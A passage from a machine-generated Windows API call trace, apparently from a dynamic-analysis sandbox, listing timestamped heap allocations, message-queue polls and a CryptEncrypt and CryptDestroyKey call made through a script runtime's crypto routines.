hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0030.088] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0030.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.088] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.088] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0030.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.088] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.089] CharLowerBuffW (in: lpsz="byte[4689]", cchLength=0xa | out: lpsz="byte[4689]") returned 0xa [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0030.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.090] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.090] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0030.090] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0030.090] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8affc0*, pdwDataLen=0x6ae220*=0x1245, dwBufLen=0x1250 | out: pbData=0x8affc0*, pdwDataLen=0x6ae220*=0x1250) returned 1 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0030.090] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.090] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.090] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.091] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.091] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.091] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0030.091] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.091] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.091] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.091] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.091] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.091] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.091] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.091] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.091] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.091] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.091] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0030.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.092] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.092] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.092] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0030.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.093] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.093] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.093] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0030.093] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0030.093] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.093] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.093] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0030.094] CryptDestroyKey (hKey=0x7c2200) returned 1 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.094] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.094] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0030.094] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.094] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.094] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.094] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.094] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.094] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.095] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.095] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0030.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.095] RtlAllocateHeap 